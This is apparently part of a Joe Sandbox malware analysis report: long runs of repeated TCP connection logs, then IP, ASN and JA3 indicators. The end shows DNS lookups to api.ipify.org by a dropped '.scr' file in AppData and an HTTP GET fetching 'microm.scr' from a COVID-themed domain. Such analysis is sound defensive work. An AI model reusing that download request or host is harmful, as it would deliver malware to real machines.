              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
              Source: global trafficTCP traffic: 172.67.74.152:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
              Source: global trafficTCP traffic: 172.67.74.152:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 172.67.74.152:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
              Source: global trafficTCP traffic: 172.67.74.152:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 172.67.74.152:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 172.67.74.152:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
              Source: global trafficTCP traffic: 172.67.74.152:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 172.67.74.152:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 172.67.74.152:443 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
              Source: Joe Sandbox ViewIP Address: 104.21.83.128 104.21.83.128
              Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
              Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
              Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
              Source: C:\Users\user\AppData\Roaming\microme09255.scrDNS query: name: api.ipify.org
              Source: C:\Users\user\AppData\Roaming\microme09255.scrDNS query: name: api.ipify.org
              Source: C:\Users\user\AppData\Roaming\microme09255.scrDNS query: name: api.ipify.org
              Source: global trafficHTTP traffic detected: GET /microm.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19help.topConnection: Keep-Alive
